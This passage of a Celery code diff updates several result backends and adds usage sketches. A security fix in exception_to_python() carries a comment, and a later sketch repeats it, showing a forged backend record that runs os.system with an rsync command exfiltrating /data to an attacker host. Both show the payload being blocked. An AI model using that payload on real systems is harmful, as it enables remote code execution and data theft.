- # The type can contain qualified name with parent classes
- for name in exc_type.split('.'):
- cls = getattr(cls, name)
- except (KeyError, AttributeError):
- cls = create_exception_cls(exc_type,
- celery.exceptions.__name__)
- exc_msg = exc['exc_message']
- try:
- if isinstance(exc_msg, (tuple, list)):
- exc = cls(*exc_msg)
- else:
- exc = cls(exc_msg)
- except Exception as err: # noqa
- exc = Exception(f'{cls}({exc_msg})')
+ if not exc:
+ return None
+ elif isinstance(exc, BaseException):
if self.serializer in EXCEPTION_ABLE_CODECS:
exc = get_pickled_exception(exc)
+ return exc
+ elif not isinstance(exc, dict):
+ try:
+ exc = dict(exc)
+ except TypeError as e:
+ raise TypeError(f"If the stored exception isn't an "
+ f"instance of "
+ f"BaseException, it must be a dictionary.\n"
+ f"Instead got: {exc}") from e
+
+ exc_module = exc.get('exc_module')
+ try:
+ exc_type = exc['exc_type']
+ except KeyError as e:
+ raise ValueError("Exception information must include"
+ "the exception type") from e
+ if exc_module is None:
+ cls = create_exception_cls(
+ exc_type, __name__)
+ else:
+ try:
+ # Load module and find exception class in that
+ cls = sys.modules[exc_module]
+ # The type can contain qualified name with parent classes
+ for name in exc_type.split('.'):
+ cls = getattr(cls, name)
+ except (KeyError, AttributeError):
+ cls = create_exception_cls(exc_type,
+ celery.exceptions.__name__)
+ exc_msg = exc.get('exc_message', '')
+
+ # If the recreated exception type isn't indeed an exception,
+ # this is a security issue. Without the condition below, an attacker
+ # could exploit a stored command vulnerability to execute arbitrary
+ # python code such as:
+ # os.system("rsync /data attacker@192.168.56.100:~/data")
+ # The attacker sets the task's result to a failure in the result
+ # backend with the os as the module, the system function as the
+ # exception type and the payload
+ # rsync /data attacker@192.168.56.100:~/data
+ # as the exception arguments like so:
+ # {
+ # "exc_module": "os",
+ # "exc_type": "system",
+ # "exc_message": "rsync /data attacker@192.168.56.100:~/data"
+ # }
+ if not isinstance(cls, type) or not issubclass(cls, BaseException):
+ fake_exc_type = exc_type if exc_module is None else f'{exc_module}.{exc_type}'
+ raise SecurityError(
+ f"Expected an exception class, got {fake_exc_type} with payload {exc_msg}")
+
+ # XXX: Without verifying `cls` is actually an exception class,
+ # an attacker could execute arbitrary python code.
+ # cls could be anything, even eval().
+ try:
+ if isinstance(exc_msg, (tuple, list)):
+ exc = cls(*exc_msg)
+ else:
+ exc = cls(exc_msg)
+ except Exception as err: # noqa
+ exc = Exception(f'{cls}({exc_msg})')
+
return exc
def prepare_value(self, result):
@@ -576,11 +666,7 @@ def delete_group(self, group_id):
return self._delete_group(group_id)
def cleanup(self):
- """Backend cleanup.
-
- Note:
- This is run by :class:`celery.task.DeleteExpiredTaskMetaTask`.
- """
+ """Backend cleanup."""
def process_cleanup(self):
"""Cleanup actions to do at the end of a task worker process."""
@@ -594,11 +680,25 @@ def add_to_chord(self, chord_id, result):
def on_chord_part_return(self, request, state, result, **kwargs):
pass
+ def set_chord_size(self, group_id, chord_size):
+ pass
+
def fallback_chord_unlock(self, header_result, body, countdown=1,
**kwargs):
kwargs['result'] = [r.as_tuple() for r in header_result]
- queue = body.options.get('queue', getattr(body.type, 'queue', None))
- priority = body.options.get('priority', getattr(body.type, 'priority', 0))
+ try:
+ body_type = getattr(body, 'type', None)
+ except NotRegistered:
+ body_type = None
+
+ queue = body.options.get('queue', getattr(body_type, 'queue', None))
+
+ if queue is None:
+ # fallback to default routing if queue name was not
+ # explicitly passed to body callback
+ queue = self.app.amqp.router.route(kwargs, body.name)['queue'].name
+
+ priority = body.options.get('priority', getattr(body_type, 'priority', 0))
self.app.tasks['celery.chord_unlock'].apply_async(
(header_result.id, body,), kwargs,
countdown=countdown,
@@ -609,8 +709,9 @@ def fallback_chord_unlock(self, header_result, body, countdown=1,
def ensure_chords_allowed(self):
pass
- def apply_chord(self, header_result, body, **kwargs):
+ def apply_chord(self, header_result_args, body, **kwargs):
self.ensure_chords_allowed()
+ header_result = self.app.GroupResult(*header_result_args)
self.fallback_chord_unlock(header_result, body, **kwargs)
def current_task_children(self, request=None):
@@ -705,7 +806,7 @@ class BaseBackend(Backend, SyncBackendMixin):
"""Base (synchronous) result backend."""
-BaseDictBackend = BaseBackend # noqa: E305 XXX compat
+BaseDictBackend = BaseBackend # XXX compat
class BaseKeyValueStoreBackend(Backend):
@@ -857,7 +958,11 @@ def _store_result(self, task_id, result, state,
if current_meta['status'] == states.SUCCESS:
return result
- self._set_with_state(self.get_key_for_task(task_id), self.encode(meta), state)
+ try:
+ self._set_with_state(self.get_key_for_task(task_id), self.encode(meta), state)
+ except BackendStoreError as ex:
+ raise BackendStoreError(str(ex), state=state, task_id=task_id) from ex
+
return result
def _save_group(self, group_id, result):
@@ -887,8 +992,9 @@ def _restore_group(self, group_id):
meta['result'] = result_from_tuple(result, self.app)
return meta
- def _apply_chord_incr(self, header_result, body, **kwargs):
+ def _apply_chord_incr(self, header_result_args, body, **kwargs):
self.ensure_chords_allowed()
+ header_result = self.app.GroupResult(*header_result_args)
header_result.save(backend=self)
def on_chord_part_return(self, request, state, result, **kwargs):
@@ -919,7 +1025,11 @@ def on_chord_part_return(self, request, state, result, **kwargs):
ChordError(f'GroupResult {gid} no longer exists'),
)
val = self.incr(key)
- size = len(deps)
+ # Set the chord size to the value defined in the request, or fall back
+ # to the number of dependencies we can see from the restored result
+ size = request.chord.get("chord_size")
+ if size is None:
+ size = len(deps)
if val > size: # pragma: no cover
logger.warning('Chord counter incremented too many times for %r',
gid)
@@ -928,7 +1038,9 @@ def on_chord_part_return(self, request, state, result, **kwargs):
j = deps.join_native if deps.supports_native_join else deps.join
try:
with allow_join_result():
- ret = j(timeout=3.0, propagate=True)
+ ret = j(
+ timeout=app.conf.result_chord_join_timeout,
+ propagate=True)
except Exception as exc: # pylint: disable=broad-except
try:
culprit = next(deps._failed_join_report())
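To make the ``SecurityError`` check in ``exception_to_python()`` concrete, a small sketch using the forged meta described in the comments above (the backend URL is a placeholder):

    from celery import Celery
    from celery.exceptions import SecurityError

    app = Celery('example', broker='memory://', backend='cache+memory://')

    # A module/attribute pair naming a callable rather than an exception
    # class; with the issubclass(BaseException) check above this is
    # rejected instead of being instantiated.
    malicious_meta = {
        'exc_module': 'os',
        'exc_type': 'system',
        'exc_message': 'rsync /data attacker@192.168.56.100:~/data',
    }

    try:
        app.backend.exception_to_python(malicious_meta)
    except SecurityError as exc:
        print('rejected:', exc)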
diff --git a/celery/backends/cache.py b/celery/backends/cache.py
index 01ac1ac3e5f..7d17837ffd7 100644
--- a/celery/backends/cache.py
+++ b/celery/backends/cache.py
@@ -20,6 +20,10 @@
Please use one of the following backends instead: {1}\
"""
+# Global shared in-memory cache for in-memory cache client
+# This is to share cache between threads
+_DUMMY_CLIENT_CACHE = LRUCache(limit=5000)
+
def import_best_memcache():
if _imp[0] is None:
@@ -29,7 +33,7 @@ def import_best_memcache():
is_pylibmc = True
except ImportError:
try:
- import memcache # noqa
+ import memcache
except ImportError:
raise ImproperlyConfigured(REQUIRES_BACKEND)
_imp[0] = (is_pylibmc, memcache, memcache_key_t)
@@ -43,7 +47,7 @@ def get_best_memcache(*args, **kwargs):
Client = _Client = memcache.Client
if not is_pylibmc:
- def Client(*args, **kwargs): # noqa
+ def Client(*args, **kwargs):
kwargs.pop('behaviors', None)
return _Client(*args, **kwargs)
@@ -53,7 +57,7 @@ def Client(*args, **kwargs): # noqa
class DummyClient:
def __init__(self, *args, **kwargs):
- self.cache = LRUCache(limit=5000)
+ self.cache = _DUMMY_CLIENT_CACHE
def get(self, key, *args, **kwargs):
return self.cache.get(key)
@@ -124,11 +128,11 @@ def set(self, key, value):
def delete(self, key):
return self.client.delete(key)
- def _apply_chord_incr(self, header_result, body, **kwargs):
- chord_key = self.get_key_for_chord(header_result.id)
+ def _apply_chord_incr(self, header_result_args, body, **kwargs):
+ chord_key = self.get_key_for_chord(header_result_args[0])
self.client.set(chord_key, 0, time=self.expires)
return super()._apply_chord_incr(
- header_result, body, **kwargs)
+ header_result_args, body, **kwargs)
def incr(self, key):
return self.client.incr(key)
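The module-level ``_DUMMY_CLIENT_CACHE`` above means separate in-memory clients now see each other's writes; a small sketch (the key and value are illustrative):

    from celery.backends.cache import DummyClient

    a, b = DummyClient(), DummyClient()
    a.set('celery-task-meta-abc', b'{"status": "SUCCESS"}')
    # A second client (e.g. one created by another thread in the same
    # process) reads the value stored by the first.
    assert b.get('celery-task-meta-abc') == b'{"status": "SUCCESS"}'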
diff --git a/celery/backends/cassandra.py b/celery/backends/cassandra.py
index 72bb33dfe9f..bf4f69c2753 100644
--- a/celery/backends/cassandra.py
+++ b/celery/backends/cassandra.py
@@ -1,5 +1,4 @@
"""Apache Cassandra result store backend using the DataStax driver."""
-import sys
import threading
from celery import states
@@ -14,7 +13,7 @@
import cassandra.cluster
import cassandra.query
except ImportError: # pragma: no cover
- cassandra = None # noqa
+ cassandra = None
__all__ = ('CassandraBackend',)
@@ -60,11 +59,9 @@
USING TTL {0}
"""
-if sys.version_info[0] == 3:
- def buf_t(x):
- return bytes(x, 'utf8')
-else:
- buf_t = buffer # noqa
+
+def buf_t(x):
+ return bytes(x, 'utf8')
class CassandraBackend(BaseBackend):
diff --git a/celery/backends/consul.py b/celery/backends/consul.py
index 106953a1271..a4ab148469c 100644
--- a/celery/backends/consul.py
+++ b/celery/backends/consul.py
@@ -31,7 +31,6 @@ class ConsulBackend(KeyValueStoreBackend):
supports_autoexpire = True
- client = None
consistency = 'consistent'
path = None
@@ -40,15 +39,33 @@ def __init__(self, *args, **kwargs):
if self.consul is None:
raise ImproperlyConfigured(CONSUL_MISSING)
-
+ #
+ # By default, for correctness, we use a client connection per
+ # operation. If set, self.one_client will be used for all operations.
+ # This provides for the original behaviour to be selected, and is
+ # also convenient for mocking in the unit tests.
+ #
+ self.one_client = None
self._init_from_params(**parse_url(self.url))
def _init_from_params(self, hostname, port, virtual_host, **params):
logger.debug('Setting on Consul client to connect to %s:%d',
hostname, port)
self.path = virtual_host
- self.client = consul.Consul(host=hostname, port=port,
- consistency=self.consistency)
+ self.hostname = hostname
+ self.port = port
+ #
+ # Optionally, allow a single client connection to be used to reduce
+ # the connection load on Consul by adding a "one_client=1" parameter
+ # to the URL.
+ #
+ if params.get('one_client', None):
+ self.one_client = self.client()
+
+ def client(self):
+ return self.one_client or consul.Consul(host=self.hostname,
+ port=self.port,
+ consistency=self.consistency)
def _key_to_consul_key(self, key):
key = bytes_to_str(key)
@@ -58,7 +75,7 @@ def get(self, key):
key = self._key_to_consul_key(key)
logger.debug('Trying to fetch key %s from Consul', key)
try:
- _, data = self.client.kv.get(key)
+ _, data = self.client().kv.get(key)
return data['Value']
except TypeError:
pass
@@ -84,17 +101,16 @@ def set(self, key, value):
logger.debug('Trying to create Consul session %s with TTL %d',
session_name, self.expires)
- session_id = self.client.session.create(name=session_name,
- behavior='delete',
- ttl=self.expires)
+ client = self.client()
+ session_id = client.session.create(name=session_name,
+ behavior='delete',
+ ttl=self.expires)
logger.debug('Created Consul session %s', session_id)
logger.debug('Writing key %s to Consul', key)
- return self.client.kv.put(key=key,
- value=value,
- acquire=session_id)
+ return client.kv.put(key=key, value=value, acquire=session_id)
def delete(self, key):
key = self._key_to_consul_key(key)
logger.debug('Removing key %s from Consul', key)
- return self.client.kv.delete(key)
+ return self.client().kv.delete(key)
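A hedged example of opting back into a single shared Consul connection via the new ``one_client`` URL parameter (host and path are placeholders):

    from celery import Celery

    app = Celery('example', broker='memory://')
    # One consul.Consul client per operation is now the default; the
    # query parameter below restores the previous shared-client behaviour.
    app.conf.result_backend = 'consul://localhost:8500/celery?one_client=1'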
diff --git a/celery/backends/cosmosdbsql.py b/celery/backends/cosmosdbsql.py
index 899cbcb866c..344e46ede0c 100644
--- a/celery/backends/cosmosdbsql.py
+++ b/celery/backends/cosmosdbsql.py
@@ -17,7 +17,7 @@
from pydocumentdb.retry_options import RetryOptions
except ImportError: # pragma: no cover
pydocumentdb = DocumentClient = ConsistencyLevel = PartitionKind = \
- HTTPFailure = ConnectionPolicy = RetryOptions = None # noqa
+ HTTPFailure = ConnectionPolicy = RetryOptions = None
__all__ = ("CosmosDBSQLBackend",)
diff --git a/celery/backends/couchdb.py b/celery/backends/couchdb.py
index 58349aceb69..a4b040dab75 100644
--- a/celery/backends/couchdb.py
+++ b/celery/backends/couchdb.py
@@ -9,7 +9,7 @@
try:
import pycouchdb
except ImportError:
- pycouchdb = None # noqa
+ pycouchdb = None
__all__ = ('CouchBackend',)
@@ -42,7 +42,7 @@ def __init__(self, url=None, *args, **kwargs):
uscheme = uhost = uport = uname = upass = ucontainer = None
if url:
- _, uhost, uport, uname, upass, ucontainer, _ = _parse_url(url) # noqa
+ _, uhost, uport, uname, upass, ucontainer, _ = _parse_url(url)
ucontainer = ucontainer.strip('/') if ucontainer else None
self.scheme = uscheme or self.scheme
@@ -75,6 +75,7 @@ def connection(self):
return self._connection
def get(self, key):
+ key = bytes_to_str(key)
try:
return self.connection.get(key)['value']
except pycouchdb.exceptions.NotFound:
diff --git a/celery/backends/database/session.py b/celery/backends/database/session.py
index 047a9271d92..415d4623e00 100644
--- a/celery/backends/database/session.py
+++ b/celery/backends/database/session.py
@@ -1,14 +1,26 @@
"""SQLAlchemy session."""
+import time
+
from kombu.utils.compat import register_after_fork
from sqlalchemy import create_engine
-from sqlalchemy.ext.declarative import declarative_base
+from sqlalchemy.exc import DatabaseError
from sqlalchemy.orm import sessionmaker
from sqlalchemy.pool import NullPool
+from celery.utils.time import get_exponential_backoff_interval
+
+try:
+ from sqlalchemy.orm import declarative_base
+except ImportError:
+ # TODO: Remove this once we drop support for SQLAlchemy < 1.4.
+ from sqlalchemy.ext.declarative import declarative_base
+
ResultModelBase = declarative_base()
__all__ = ('SessionManager',)
+PREPARE_MODELS_MAX_RETRIES = 10
+
def _after_fork_cleanup_session(session):
session._after_fork()
@@ -50,7 +62,25 @@ def create_session(self, dburi, short_lived_sessions=False, **kwargs):
def prepare_models(self, engine):
if not self.prepared:
- ResultModelBase.metadata.create_all(engine)
+ # SQLAlchemy will check if the items exist before trying to
+ # create them, which is a race condition. If it raises an error
+ # in one iteration, the next may pass all the existence checks
+ # and the call will succeed.
+ retries = 0
+ while True:
+ try:
+ ResultModelBase.metadata.create_all(engine)
+ except DatabaseError:
+ if retries < PREPARE_MODELS_MAX_RETRIES:
+ sleep_amount_ms = get_exponential_backoff_interval(
+ 10, retries, 1000, True
+ )
+ time.sleep(sleep_amount_ms / 1000)
+ retries += 1
+ else:
+ raise
+ else:
+ break
self.prepared = True
def session_factory(self, dburi, **kwargs):
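The retry loop above sleeps for an exponentially growing, jittered interval between attempts; a sketch of the helper it calls, using the same arguments as ``prepare_models()``:

    from celery.utils.time import get_exponential_backoff_interval

    # factor=10, maximum=1000 ms, full_jitter=True, as in the diff above.
    for attempt in range(3):
        delay_ms = get_exponential_backoff_interval(10, attempt, 1000, True)
        print(f'attempt {attempt}: sleep up to {delay_ms} ms before retrying')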
diff --git a/celery/backends/dynamodb.py b/celery/backends/dynamodb.py
index 25a8e3423c1..4fbd9aaf7d7 100644
--- a/celery/backends/dynamodb.py
+++ b/celery/backends/dynamodb.py
@@ -13,7 +13,7 @@
import boto3
from botocore.exceptions import ClientError
except ImportError: # pragma: no cover
- boto3 = ClientError = None # noqa
+ boto3 = ClientError = None
__all__ = ('DynamoDBBackend',)
diff --git a/celery/backends/elasticsearch.py b/celery/backends/elasticsearch.py
index 886acd02475..c40b15ddec8 100644
--- a/celery/backends/elasticsearch.py
+++ b/celery/backends/elasticsearch.py
@@ -12,7 +12,7 @@
try:
import elasticsearch
except ImportError: # pragma: no cover
- elasticsearch = None # noqa
+ elasticsearch = None
__all__ = ('ElasticsearchBackend',)
@@ -52,7 +52,7 @@ def __init__(self, url=None, *args, **kwargs):
index = doc_type = scheme = host = port = username = password = None
if url:
- scheme, host, port, username, password, path, _ = _parse_url(url) # noqa
+ scheme, host, port, username, password, path, _ = _parse_url(url)
if scheme == 'elasticsearch':
scheme = None
if path:
@@ -199,10 +199,10 @@ def _update(self, id, body, state, **kwargs):
def encode(self, data):
if self.es_save_meta_as_text:
- return KeyValueStoreBackend.encode(self, data)
+ return super().encode(data)
else:
if not isinstance(data, dict):
- return KeyValueStoreBackend.encode(self, data)
+ return super().encode(data)
if data.get("result"):
data["result"] = self._encode(data["result"])[2]
if data.get("traceback"):
@@ -211,14 +211,14 @@ def encode(self, data):
def decode(self, payload):
if self.es_save_meta_as_text:
- return KeyValueStoreBackend.decode(self, payload)
+ return super().decode(payload)
else:
if not isinstance(payload, dict):
- return KeyValueStoreBackend.decode(self, payload)
+ return super().decode(payload)
if payload.get("result"):
- payload["result"] = KeyValueStoreBackend.decode(self, payload["result"])
+ payload["result"] = super().decode(payload["result"])
if payload.get("traceback"):
- payload["traceback"] = KeyValueStoreBackend.decode(self, payload["traceback"])
+ payload["traceback"] = super().decode(payload["traceback"])
return payload
def mget(self, keys):
diff --git a/celery/backends/filesystem.py b/celery/backends/filesystem.py
index 6b937b693b5..6bc6bb141d0 100644
--- a/celery/backends/filesystem.py
+++ b/celery/backends/filesystem.py
@@ -1,6 +1,7 @@
"""File-system result store backend."""
import locale
import os
+from datetime import datetime
from kombu.utils.encoding import ensure_bytes
@@ -38,6 +39,10 @@ def __init__(self, url=None, open=open, unlink=os.unlink, sep=os.sep,
self.url = url
path = self._find_path(url)
+ # Remove forwarding "/" for Windows os
+ if os.name == "nt" and path.startswith("/"):
+ path = path[1:]
+
# We need the path and separator as bytes objects
self.path = path.encode(encoding)
self.sep = sep.encode(encoding)
@@ -90,3 +95,19 @@ def mget(self, keys):
def delete(self, key):
self.unlink(self._filename(key))
+
+ def cleanup(self):
+ """Delete expired meta-data."""
+ if not self.expires:
+ return
+ epoch = datetime(1970, 1, 1, tzinfo=self.app.timezone)
+ now_ts = (self.app.now() - epoch).total_seconds()
+ cutoff_ts = now_ts - self.expires
+ for filename in os.listdir(self.path):
+ for prefix in (self.task_keyprefix, self.group_keyprefix,
+ self.chord_keyprefix):
+ if filename.startswith(prefix):
+ path = os.path.join(self.path, filename)
+ if os.stat(path).st_mtime < cutoff_ts:
+ self.unlink(path)
+ break
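A hedged configuration sketch for the new cleanup (the path is a placeholder); expired meta files are removed when the periodic ``celery.backend_cleanup`` task runs:

    from celery import Celery

    app = Celery('example', broker='memory://')
    app.conf.result_backend = 'file:///var/celery/results'
    # cleanup() above compares each file's mtime against now - expires,
    # where expires is derived from result_expires; a falsy value
    # disables the scan entirely.
    app.conf.result_expires = 3600  # seconds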
diff --git a/celery/backends/mongodb.py b/celery/backends/mongodb.py
index 5ae3ddf8223..b78e4d015b4 100644
--- a/celery/backends/mongodb.py
+++ b/celery/backends/mongodb.py
@@ -13,18 +13,18 @@
try:
import pymongo
except ImportError: # pragma: no cover
- pymongo = None # noqa
+ pymongo = None
if pymongo:
try:
from bson.binary import Binary
except ImportError: # pragma: no cover
- from pymongo.binary import Binary # noqa
- from pymongo.errors import InvalidDocument # noqa
+ from pymongo.binary import Binary
+ from pymongo.errors import InvalidDocument
else: # pragma: no cover
- Binary = None # noqa
+ Binary = None
- class InvalidDocument(Exception): # noqa
+ class InvalidDocument(Exception):
pass
__all__ = ('MongoBackend',)
@@ -202,8 +202,8 @@ def _get_task_meta_for(self, task_id):
'status': obj['status'],
'result': self.decode(obj['result']),
'date_done': obj['date_done'],
- 'traceback': self.decode(obj['traceback']),
- 'children': self.decode(obj['children']),
+ 'traceback': obj['traceback'],
+ 'children': obj['children'],
})
return {'status': states.PENDING, 'result': None}
@@ -248,6 +248,9 @@ def _forget(self, task_id):
def cleanup(self):
"""Delete expired meta-data."""
+ if not self.expires:
+ return
+
self.collection.delete_many(
{'date_done': {'$lt': self.app.now() - self.expires_delta}},
)
diff --git a/celery/backends/redis.py b/celery/backends/redis.py
index 1b9db7433fe..7eedc4c089b 100644
--- a/celery/backends/redis.py
+++ b/celery/backends/redis.py
@@ -7,13 +7,15 @@
from kombu.utils.functional import retry_over_time
from kombu.utils.objects import cached_property
-from kombu.utils.url import _parse_url
+from kombu.utils.url import _parse_url, maybe_sanitize_url
from celery import states
from celery._state import task_join_will_block
from celery.canvas import maybe_signature
-from celery.exceptions import ChordError, ImproperlyConfigured
-from celery.utils.functional import dictfilter
+from celery.exceptions import (BackendStoreError, ChordError,
+ ImproperlyConfigured)
+from celery.result import GroupResult, allow_join_result
+from celery.utils.functional import _regen, dictfilter
from celery.utils.log import get_logger
from celery.utils.time import humanize_seconds
@@ -24,8 +26,8 @@
import redis.connection
from kombu.transport.redis import get_redis_error_classes
except ImportError: # pragma: no cover
- redis = None # noqa
- get_redis_error_classes = None # noqa
+ redis = None
+ get_redis_error_classes = None
try:
import redis.sentinel
@@ -46,13 +48,13 @@
W_REDIS_SSL_CERT_OPTIONAL = """
Setting ssl_cert_reqs=CERT_OPTIONAL when connecting to redis means that \
-celery might not valdate the identity of the redis broker when connecting. \
+celery might not validate the identity of the redis broker when connecting. \
This leaves you vulnerable to man in the middle attacks.
"""
W_REDIS_SSL_CERT_NONE = """
Setting ssl_cert_reqs=CERT_NONE when connecting to redis means that celery \
-will not valdate the identity of the redis broker when connecting. This \
+will not validate the identity of the redis broker when connecting. This \
leaves you vulnerable to man in the middle attacks.
"""
@@ -108,7 +110,8 @@ def _reconnect_pubsub(self):
self._pubsub = self.backend.client.pubsub(
ignore_subscribe_messages=True,
)
- self._pubsub.subscribe(*self.subscribed_to)
+ if self.subscribed_to:
+ self._pubsub.subscribe(*self.subscribed_to)
@contextmanager
def reconnect_on_error(self):
@@ -184,6 +187,7 @@ class RedisBackend(BaseKeyValueStoreBackend, AsyncBackendMixin):
#: :pypi:`redis` client module.
redis = redis
+ connection_class_ssl = redis.SSLConnection if redis else None
#: Maximum number of connections in the pool.
max_connections = None
@@ -191,6 +195,10 @@ class RedisBackend(BaseKeyValueStoreBackend, AsyncBackendMixin):
supports_autoexpire = True
supports_native_join = True
+ #: Maximal length of string value in Redis.
+ #: 512 MB - https://redis.io/topics/data-types
+ _MAX_STR_VALUE_SIZE = 536870912
+
def __init__(self, host=None, port=None, db=None, password=None,
max_connections=None, url=None,
connection_pool=None, **kwargs):
@@ -212,6 +220,7 @@ def __init__(self, host=None, port=None, db=None, password=None,
socket_connect_timeout = _get('redis_socket_connect_timeout')
retry_on_timeout = _get('redis_retry_on_timeout')
socket_keepalive = _get('redis_socket_keepalive')
+ health_check_interval = _get('redis_backend_health_check_interval')
self.connparams = {
'host': _get('redis_host') or 'localhost',
@@ -225,6 +234,20 @@ def __init__(self, host=None, port=None, db=None, password=None,
socket_connect_timeout and float(socket_connect_timeout),
}
+ username = _get('redis_username')
+ if username:
+ # We're extra careful to avoid including this configuration value
+ # if it wasn't specified since older versions of py-redis
+ # don't support specifying a username.
+ # Only Redis>6.0 supports username/password authentication.
+
+ # TODO: Include this in connparams' definition once we drop
+ # support for py-redis<3.4.0.
+ self.connparams['username'] = username
+
+ if health_check_interval:
+ self.connparams["health_check_interval"] = health_check_interval
+
# absent in redis.connection.UnixDomainSocketConnection
if socket_keepalive:
self.connparams['socket_keepalive'] = socket_keepalive
@@ -235,7 +258,7 @@ def __init__(self, host=None, port=None, db=None, password=None,
ssl = _get('redis_backend_use_ssl')
if ssl:
self.connparams.update(ssl)
- self.connparams['connection_class'] = redis.SSLConnection
+ self.connparams['connection_class'] = self.connection_class_ssl
if url:
self.connparams = self._params_from_url(url, self.connparams)
@@ -244,7 +267,7 @@ def __init__(self, host=None, port=None, db=None, password=None,
# redis_backend_use_ssl dict, check ssl_cert_reqs is valid. If set
# via query string ssl_cert_reqs will be a string so convert it here
if ('connection_class' in self.connparams and
- self.connparams['connection_class'] is redis.SSLConnection):
+ issubclass(self.connparams['connection_class'], redis.SSLConnection)):
ssl_cert_reqs_missing = 'MISSING'
ssl_string_to_constant = {'CERT_REQUIRED': CERT_REQUIRED,
'CERT_OPTIONAL': CERT_OPTIONAL,
@@ -274,11 +297,11 @@ def __init__(self, host=None, port=None, db=None, password=None,
)
def _params_from_url(self, url, defaults):
- scheme, host, port, _, password, path, query = _parse_url(url)
+ scheme, host, port, username, password, path, query = _parse_url(url)
connparams = dict(
defaults, **dictfilter({
- 'host': host, 'port': port, 'password': password,
- 'db': query.pop('virtual_host', None)})
+ 'host': host, 'port': port, 'username': username,
+ 'password': password, 'db': query.pop('virtual_host', None)})
)
if scheme == 'socket':
@@ -363,6 +386,9 @@ def on_connection_error(self, max_retries, exc, intervals, retries):
return tts
def set(self, key, value, **retry_policy):
+ if isinstance(value, str) and len(value) > self._MAX_STR_VALUE_SIZE:
+ raise BackendStoreError('value too large for Redis backend')
+
return self.ensure(self._set, (key, value), **retry_policy)
def _set(self, key, value):
@@ -400,13 +426,20 @@ def _unpack_chord_result(self, tup, decode,
raise ChordError(f'Dependency {tid} raised {retval!r}')
return retval
- def apply_chord(self, header_result, body, **kwargs):
- # Overrides this to avoid calling GroupResult.save
- # pylint: disable=method-hidden
- # Note that KeyValueStoreBackend.__init__ sets self.apply_chord
- # if the implements_incr attr is set. Redis backend doesn't set
- # this flag.
- pass
+ def set_chord_size(self, group_id, chord_size):
+ self.set(self.get_key_for_group(group_id, '.s'), chord_size)
+
+ def apply_chord(self, header_result_args, body, **kwargs):
+ # If any of the child results of this chord are complex (ie. group
+ # results themselves), we need to save `header_result` to ensure that
+ # the expected structure is retained when we finish the chord and pass
+ # the results onward to the body in `on_chord_part_return()`. We don't
+        # do this in all cases to retain an optimisation in the common case
+ # where a chord header is comprised of simple result objects.
+ if not isinstance(header_result_args[1], _regen):
+ header_result = self.app.GroupResult(*header_result_args)
+ if any(isinstance(nr, GroupResult) for nr in header_result.results):
+ header_result.save(backend=self)
@cached_property
def _chord_zset(self):
@@ -428,6 +461,7 @@ def on_chord_part_return(self, request, state, result,
client = self.client
jkey = self.get_key_for_group(gid, '.j')
tkey = self.get_key_for_group(gid, '.t')
+ skey = self.get_key_for_group(gid, '.s')
result = self.encode_result(result, state)
encoded = self.encode([1, tid, state, result])
with client.pipeline() as pipe:
@@ -435,50 +469,80 @@ def on_chord_part_return(self, request, state, result,
pipe.zadd(jkey, {encoded: group_index}).zcount(jkey, "-inf", "+inf")
if self._chord_zset
else pipe.rpush(jkey, encoded).llen(jkey)
- ).get(tkey)
- if self.expires is not None:
+ ).get(tkey).get(skey)
+ if self.expires:
pipeline = pipeline \
.expire(jkey, self.expires) \
- .expire(tkey, self.expires)
+ .expire(tkey, self.expires) \
+ .expire(skey, self.expires)
- _, readycount, totaldiff = pipeline.execute()[:3]
+ _, readycount, totaldiff, chord_size_bytes = pipeline.execute()[:4]
totaldiff = int(totaldiff or 0)
- try:
- callback = maybe_signature(request.chord, app=app)
- total = callback['chord_size'] + totaldiff
- if readycount == total:
- decode, unpack = self.decode, self._unpack_chord_result
- with client.pipeline() as pipe:
- if self._chord_zset:
- pipeline = pipe.zrange(jkey, 0, -1)
+ if chord_size_bytes:
+ try:
+ callback = maybe_signature(request.chord, app=app)
+ total = int(chord_size_bytes) + totaldiff
+ if readycount == total:
+ header_result = GroupResult.restore(gid)
+ if header_result is not None:
+ # If we manage to restore a `GroupResult`, then it must
+ # have been complex and saved by `apply_chord()` earlier.
+ #
+ # Before we can join the `GroupResult`, it needs to be
+ # manually marked as ready to avoid blocking
+ header_result.on_ready()
+ # We'll `join()` it to get the results and ensure they are
+ # structured as intended rather than the flattened version
+ # we'd construct without any other information.
+ join_func = (
+ header_result.join_native
+ if header_result.supports_native_join
+ else header_result.join
+ )
+ with allow_join_result():
+ resl = join_func(
+ timeout=app.conf.result_chord_join_timeout,
+ propagate=True
+ )
else:
- pipeline = pipe.lrange(jkey, 0, total)
- resl, = pipeline.execute()
- try:
- callback.delay([unpack(tup, decode) for tup in resl])
- with client.pipeline() as pipe:
- _, _ = pipe \
- .delete(jkey) \
- .delete(tkey) \
- .execute()
- except Exception as exc: # pylint: disable=broad-except
- logger.exception(
- 'Chord callback for %r raised: %r', request.group, exc)
- return self.chord_error_from_stack(
- callback,
- ChordError(f'Callback error: {exc!r}'),
- )
- except ChordError as exc:
- logger.exception('Chord %r raised: %r', request.group, exc)
- return self.chord_error_from_stack(callback, exc)
- except Exception as exc: # pylint: disable=broad-except
- logger.exception('Chord %r raised: %r', request.group, exc)
- return self.chord_error_from_stack(
- callback,
- ChordError(f'Join error: {exc!r}'),
- )
+ # Otherwise simply extract and decode the results we
+ # stashed along the way, which should be faster for large
+ # numbers of simple results in the chord header.
+ decode, unpack = self.decode, self._unpack_chord_result
+ with client.pipeline() as pipe:
+ if self._chord_zset:
+ pipeline = pipe.zrange(jkey, 0, -1)
+ else:
+ pipeline = pipe.lrange(jkey, 0, total)
+ resl, = pipeline.execute()
+ resl = [unpack(tup, decode) for tup in resl]
+ try:
+ callback.delay(resl)
+ except Exception as exc: # pylint: disable=broad-except
+ logger.exception(
+ 'Chord callback for %r raised: %r', request.group, exc)
+ return self.chord_error_from_stack(
+ callback,
+ ChordError(f'Callback error: {exc!r}'),
+ )
+ finally:
+ with client.pipeline() as pipe:
+ pipe \
+ .delete(jkey) \
+ .delete(tkey) \
+ .delete(skey) \
+ .execute()
+ except ChordError as exc:
+ logger.exception('Chord %r raised: %r', request.group, exc)
+ return self.chord_error_from_stack(callback, exc)
+ except Exception as exc: # pylint: disable=broad-except
+ logger.exception('Chord %r raised: %r', request.group, exc)
+ return self.chord_error_from_stack(
+ callback,
+ ChordError(f'Join error: {exc!r}'),
+ )
def _create_client(self, **params):
return self._get_client()(
@@ -508,10 +572,26 @@ def __reduce__(self, args=(), kwargs=None):
)
+if getattr(redis, "sentinel", None):
+ class SentinelManagedSSLConnection(
+ redis.sentinel.SentinelManagedConnection,
+ redis.SSLConnection):
